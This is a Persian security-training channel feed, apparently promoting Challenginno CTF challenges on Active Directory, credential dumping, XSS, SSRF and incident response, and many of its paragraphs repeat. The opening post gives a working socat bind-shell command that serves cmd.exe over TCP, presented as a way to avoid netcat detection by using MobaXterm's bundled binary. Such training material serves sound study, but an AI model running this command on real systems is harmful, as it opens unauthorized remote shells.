سلام و عرض ادب خدمت دوستان گرامی
یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست
ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه
ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست
نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.
مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):
C:\Users\test\AppData\Roaming\MobaXterm\slash\bin
به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره
دستور ایجاد کانکش جهت تست هم به شکل زیر هست:
Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Kali:
socat - TCP4:192.168.66.132:4443
یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست
ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه
ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست
نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.
مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):
C:\Users\test\AppData\Roaming\MobaXterm\slash\bin
به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره
دستور ایجاد کانکش جهت تست هم به شکل زیر هست:
Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Kali:
socat - TCP4:192.168.66.132:4443
✔️ یکی از سرویس هایی که در اکثر سازمان ها مورد استفاده قرار می گیرد سرویس Active Directory می باشد.
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/activedirectory-zero
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/activedirectory-zero
Forwarded from securityworld
✅ کتاب آشنایی با پروتکل HTTP
✔️ با توجه به استفاده روز افزون از وب و تکنولوژیهای مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل میدهد، بسیار حائز اهمیت است.
✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخشهای مختلف این پروتکل میپردازد.
🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزههای وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.
🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
✔️ با توجه به استفاده روز افزون از وب و تکنولوژیهای مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل میدهد، بسیار حائز اهمیت است.
✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخشهای مختلف این پروتکل میپردازد.
🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزههای وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.
🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
✔️ یکی از فرآیندهایی که بعد از دسترسی یا در مرحله Post Exploitation از آن استفاده میشود، تکنیک های Credential Dumping است.
✅ یکی از روشهایی که در Credential Dumping از آن استفاده میشود، استخراج هش ها از SAM سیستمهای ویندوزی میباشد.
✅ چالش جاری مربوط به همین موضوع میباشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/sam-dump-password-attacks
✅ یکی از روشهایی که در Credential Dumping از آن استفاده میشود، استخراج هش ها از SAM سیستمهای ویندوزی میباشد.
✅ چالش جاری مربوط به همین موضوع میباشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/sam-dump-password-attacks
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response
✔️ در این چالش، شما باید با تحلیل یک فایل لاگ سیسمون (Sysmon)، فعالیتهای مشکوک و مخرب یک فایل را بر روی یک سیستم عامل ویندوز 10 شناسایی کنید.
✅ فایل لاگ سیسمون ارائه شده را بارگذاری و در یک ابزار تحلیل لاگ (مانند Log Parser، Splunk، یا حتی یک اسکریپت Python) باز کنید.
✅ هدف از این چالش شناسایی فعالیتهای مشکوک و مخرب یک فایل از طریق تحلیل لاگ سیسمون می باشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/detect-malicious-activity
✅ فایل لاگ سیسمون ارائه شده را بارگذاری و در یک ابزار تحلیل لاگ (مانند Log Parser، Splunk، یا حتی یک اسکریپت Python) باز کنید.
✅ هدف از این چالش شناسایی فعالیتهای مشکوک و مخرب یک فایل از طریق تحلیل لاگ سیسمون می باشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/detect-malicious-activity
✔️ آسیب پذیری XSS یا Cross Site Scripting یکی از آسیب پذیری های موجود در وب بوده که در استاندارد OWASP و WSTG نیز به آن اشاره شده است.
✅ این چالش شامل چهار بخش است که در هر بخش شما باید آسیب پذیری XSS را به کمک راهنمایی های موجود در صفحات، اکسپلویت نموده و به فلگ نهایی برسید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/game-with-xss-vulnerability
✅ این چالش شامل چهار بخش است که در هر بخش شما باید آسیب پذیری XSS را به کمک راهنمایی های موجود در صفحات، اکسپلویت نموده و به فلگ نهایی برسید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/game-with-xss-vulnerability
✔️ در یکی از سیستمهای حساس شبکه سازمان، نشانههایی از رفتارهای غیرعادی و مشکوک مشاهده شده است. این سیستم، که تا چندی پیش بهطور معمول فعالیت میکرد، اکنون دچار اختلالات پراکندهای شده که توجه تیم امنیتی را به خود جلب کرده است.
✔️ کاربران گزارش دادهاند که عملکرد سیستم کند شده و برخی از فرآیندها بهطور غیرمنتظرهای خاتمه مییابند.
✅ تیم امنیتی با بررسیهای اولیه، نشانههایی از وجود یک عامل مخرب را در سیستم تشخیص داده است.
✅ وظیفه شما این است که با دقت در میان لاگها و فعالیتهای سیستمی، نشانههای فعالیت این تهدید را شناسایی کنید، مکانیزمهای پنهانکاری و پایداری آن را کشف کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/hunting-hidden-threats
✔️ کاربران گزارش دادهاند که عملکرد سیستم کند شده و برخی از فرآیندها بهطور غیرمنتظرهای خاتمه مییابند.
✅ تیم امنیتی با بررسیهای اولیه، نشانههایی از وجود یک عامل مخرب را در سیستم تشخیص داده است.
✅ وظیفه شما این است که با دقت در میان لاگها و فعالیتهای سیستمی، نشانههای فعالیت این تهدید را شناسایی کنید، مکانیزمهای پنهانکاری و پایداری آن را کشف کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/hunting-hidden-threats
✔️ همانطور که همه دوستان گرامی استحضار دارند، یکی از متدولوژی های رایج جهت تست نفود برنامه های تحت وب، متدولوژی WSTG بوده که متعلق به OWASP است.
✅ بخش Identity Management Testing از متدولوژی WSTG شامل تست های مختلفی است که در این چالش سعی داریم تا به بررسی برخی از آن ها بپردازیم.
✅ در این چالش شما می بایست ابتدا به مطالعه بخش Identity Management Testing در WSTG بپردازید و سپس بخش های مختلف چالش را مورد بررسی قرار دهید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/wstg-identity-management
✅ بخش Identity Management Testing از متدولوژی WSTG شامل تست های مختلفی است که در این چالش سعی داریم تا به بررسی برخی از آن ها بپردازیم.
✅ در این چالش شما می بایست ابتدا به مطالعه بخش Identity Management Testing در WSTG بپردازید و سپس بخش های مختلف چالش را مورد بررسی قرار دهید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/wstg-identity-management
✅ با سلام و عرض ادب خدمت تمامی دوستان گرامی
ابتدا بر خود لازم می دانیم تا از تمام دوستانی که در هر چه بهتر شدن وب سایت Challenginno و چالش های آن ما را یاری نمودند سپاسگزاری کنیم.
🔴 در راستای اهدافی که برای پلتفرم Challenginno در نظر گرفته شده بود، پس از چالش های آفلاین، بزودی چالش های آنلاین نیز در قالب Red Time و Blue Time ارائه خواهد شد.
🔸 منتظر خبرهای بعدی ما باشید.
🌐 https://challenginno.ir
ابتدا بر خود لازم می دانیم تا از تمام دوستانی که در هر چه بهتر شدن وب سایت Challenginno و چالش های آن ما را یاری نمودند سپاسگزاری کنیم.
🔴 در راستای اهدافی که برای پلتفرم Challenginno در نظر گرفته شده بود، پس از چالش های آفلاین، بزودی چالش های آنلاین نیز در قالب Red Time و Blue Time ارائه خواهد شد.
🔸 منتظر خبرهای بعدی ما باشید.
🌐 https://challenginno.ir
✔️ در یکی از سیستمهای کلیدی شبکه سازمان، نشانههایی از فعالیتهای غیرعادی مشاهده شده است.
✔️ این سیستم، که بهطور معمول در حال اجرای فرآیندهای حیاتی است، اخیراً دچار کندی و رفتارهای نامتعارف شده است.
✅ تیم امنیتی گزارشهایی دریافت کرده که نشان میدهد ممکن است یک عامل ناشناس بهطور مخفیانه در حال انجام فعالیتهایی بر روی سیستم باشد.
✅ بررسیهای اولیه نتوانستهاند منبع این فعالیتها را شناسایی کنند و لازم است که شما به عنوان تحلیلگر تهدیدات، به عمق سیستم نفوذ کنید تا این تهدید پنهان را کشف و تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/invisible-footprint
✔️ این سیستم، که بهطور معمول در حال اجرای فرآیندهای حیاتی است، اخیراً دچار کندی و رفتارهای نامتعارف شده است.
✅ تیم امنیتی گزارشهایی دریافت کرده که نشان میدهد ممکن است یک عامل ناشناس بهطور مخفیانه در حال انجام فعالیتهایی بر روی سیستم باشد.
✅ بررسیهای اولیه نتوانستهاند منبع این فعالیتها را شناسایی کنند و لازم است که شما به عنوان تحلیلگر تهدیدات، به عمق سیستم نفوذ کنید تا این تهدید پنهان را کشف و تحلیل کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/invisible-footprint
✔️ شما به عنوان یک تحلیلگر امنیتی مسئولیت دارید تا فعالیتهای مشکوکی را که به تازگی در شبکه سازمان شما رخ داده است، شناسایی و بررسی کنید.
✔️ گزارشها حاکی از آن است که یکی از کارمندان یک فایل اجرایی ناشناخته را اجرا کرده و به دنبال آن، دسترسیهای غیرمجاز به سطح مدیر سیستم (Administrator) به دست آمده است.
✅ شما باید با استفاده از لاگهای Sysmon به دقت این حمله را تجزیه و تحلیل کنید و مسیر مهاجم را تا زمان دستیابی به سطح دسترسیهای بالا پیگیری کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/threat-hunting-shadow-elevation
✔️ گزارشها حاکی از آن است که یکی از کارمندان یک فایل اجرایی ناشناخته را اجرا کرده و به دنبال آن، دسترسیهای غیرمجاز به سطح مدیر سیستم (Administrator) به دست آمده است.
✅ شما باید با استفاده از لاگهای Sysmon به دقت این حمله را تجزیه و تحلیل کنید و مسیر مهاجم را تا زمان دستیابی به سطح دسترسیهای بالا پیگیری کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/threat-hunting-shadow-elevation
✔️ یک مهاجم ماهر با استفاده از تکنیکهای پیشرفته برای پایداری، به سیستم ویندوز 10 شما نفوذ کرده است.
✔️ هدف مهاجم سرقت اعتبارنامههای حساس از طریق دسترسی به فرآیند Authentication و پنهان کردن ردپای خود است.
✅ شما به عنوان یک تحلیلگر امنیتی باید با بررسی لاگهای سیستم، فعالیتهای مشکوک شامل اجرای فایل های مخفی، تغییرات در بخش های مختلف سیستم و فرآیندهای غیرمعمول را شناسایی کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/phantomstrike
✔️ هدف مهاجم سرقت اعتبارنامههای حساس از طریق دسترسی به فرآیند Authentication و پنهان کردن ردپای خود است.
✅ شما به عنوان یک تحلیلگر امنیتی باید با بررسی لاگهای سیستم، فعالیتهای مشکوک شامل اجرای فایل های مخفی، تغییرات در بخش های مختلف سیستم و فرآیندهای غیرمعمول را شناسایی کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/phantomstrike
✔️ رایت آپ مربوط به چالش امنیتی Bad Login Mistake اکنون در سایت قرار شد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/admin-mistake
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/admin-mistake
✔️ برنامههای کاربردی وب اغلب با منابع داخلی یا خارجی تعامل دارند. در صورتی که در این تعامل ورودیها به درستی مدیریت نشوند آسیبپذیریهای مختلفی ممکن است رخ دهد که یکی از آنها آسیبپذیری جعل درخواست سمت سرور یا همان SSRF است.
✔️ یک حمله موفق Server-Side Request Forgery یا SSRF میتواند به مهاجم اجازه دسترسی به موارد محدود شده، سرویسهای داخلی یا فایلهای داخلی برنامه را بدهد. در برخی موارد، حتی میتواند منجر به اجرای کد از راه دور (RCE) شود.
✅ در این چالش شما با یک برنامه که دارای آسیبپذیری SSRF می باشد روبرو هستید که باید آن را اکسپلویت نموده و یک فایل محدود شده در سرور را مشاهده نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/server-side-request-forgery
✔️ یک حمله موفق Server-Side Request Forgery یا SSRF میتواند به مهاجم اجازه دسترسی به موارد محدود شده، سرویسهای داخلی یا فایلهای داخلی برنامه را بدهد. در برخی موارد، حتی میتواند منجر به اجرای کد از راه دور (RCE) شود.
✅ در این چالش شما با یک برنامه که دارای آسیبپذیری SSRF می باشد روبرو هستید که باید آن را اکسپلویت نموده و یک فایل محدود شده در سرور را مشاهده نمایید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/server-side-request-forgery
✔️ سیستم مورد هدف دستخوش تغییرات پنهانی شده که با مهارت بالا در لایههای مختلف اعمال شدهاند.
✔️ این تغییرات بهطور نامحسوس در عملکرد روزمره سیستم ادغام شده و ممکن است در نگاه اول غیرقابل تشخیص به نظر برسند. اما برای کسانی که با دقت به رفتارهای غیرمعمول نگاه میکنند، سرنخهای کوچکی از حضور یک نیروی ناشناس قابل مشاهده است.
✅ شما باید به کمک لاگهای سیستم، فرآیندهای در حال اجرا و ترافیک شبکه، سرنخهایی را که به صورت پراکنده در سیستم جاگذاری شدهاند، کشف کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/concealedstorm
✔️ این تغییرات بهطور نامحسوس در عملکرد روزمره سیستم ادغام شده و ممکن است در نگاه اول غیرقابل تشخیص به نظر برسند. اما برای کسانی که با دقت به رفتارهای غیرمعمول نگاه میکنند، سرنخهای کوچکی از حضور یک نیروی ناشناس قابل مشاهده است.
✅ شما باید به کمک لاگهای سیستم، فرآیندهای در حال اجرا و ترافیک شبکه، سرنخهایی را که به صورت پراکنده در سیستم جاگذاری شدهاند، کشف کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/concealedstorm
✔️ یکی از سرویس هایی که در اکثر سازمان ها مورد استفاده قرار می گیرد سرویس Active Directory می باشد.
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ در این چالش دو آسیب پذیری مربوط به اکتیودایرکتوری وجود دارد که البته تکنیک های جمع آوری اطلاعات و همچنین Post Exploitation هم باید مد نظر دوستان قرار گیرد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/kerberoast-sync
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ در این چالش دو آسیب پذیری مربوط به اکتیودایرکتوری وجود دارد که البته تکنیک های جمع آوری اطلاعات و همچنین Post Exploitation هم باید مد نظر دوستان قرار گیرد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/kerberoast-sync
✔️ یک فرآیند خاص در سیستم در حال اجرای دستورات مخرب است، از ابزارهای سیستمی بهره میبرد، ارتباطات شبکهای مشکوک برقرار کرده و فایلهایی را ایجاد و حذف کرده است.
✔️ چالش به نحوی طراحی شده است که شناسایی فعالیتهای مشکوک پیچیدهتر باشد و نیاز به دقت در تحلیل داشته باشد.
✅ هدف شما کشف تکنیکهای بهکار رفته توسط مهاجم، شناسایی رفتارهای مخرب و تحلیل ارتباطات شبکه است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/silent-infiltration
✔️ چالش به نحوی طراحی شده است که شناسایی فعالیتهای مشکوک پیچیدهتر باشد و نیاز به دقت در تحلیل داشته باشد.
✅ هدف شما کشف تکنیکهای بهکار رفته توسط مهاجم، شناسایی رفتارهای مخرب و تحلیل ارتباطات شبکه است.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/silent-infiltration
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده دومین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-2
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده دومین بخش از این مجموعه چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response-2
✔️ سرویس Active Directory یک سرویس دایرکتوری است که توسط شرکت مایکروسافت طراحی شده و برای مدیریت منابع شبکهای نظیر کاربران، کامپیوترها و گروهها در شبکههای ویندوزی به کار میرود.
✅ این سرویس امکان تمرکز بر مدیریت کاربران، کنترل دسترسی، سیاستهای امنیتی و اشتراکگذاری منابع را فراهم میکند و با توجه به قابلیتهایی که دارد در اغلب شبکهها مورد استفاده قرار میگیرد.
✅ اکتیودایرکتوری برای مدیریت هویت و دسترسی کاربران به منابع شبکه در یک ساختار سلسلهمراتبی طراحی شده است و بر پایه پروتکلهای استاندارد مانند LDAP ،Kerberos و DNS کار میکند.
✅ در این چالش که به صورت پرسش و پاسخ ایجاد شده است، ابتدا شما میبایست فایل پیوست را مطالعه نموده و سپس به سوالات این بخش پاسخ دهید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/active-directory-concepts
✅ این سرویس امکان تمرکز بر مدیریت کاربران، کنترل دسترسی، سیاستهای امنیتی و اشتراکگذاری منابع را فراهم میکند و با توجه به قابلیتهایی که دارد در اغلب شبکهها مورد استفاده قرار میگیرد.
✅ اکتیودایرکتوری برای مدیریت هویت و دسترسی کاربران به منابع شبکه در یک ساختار سلسلهمراتبی طراحی شده است و بر پایه پروتکلهای استاندارد مانند LDAP ،Kerberos و DNS کار میکند.
✅ در این چالش که به صورت پرسش و پاسخ ایجاد شده است، ابتدا شما میبایست فایل پیوست را مطالعه نموده و سپس به سوالات این بخش پاسخ دهید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/active-directory-concepts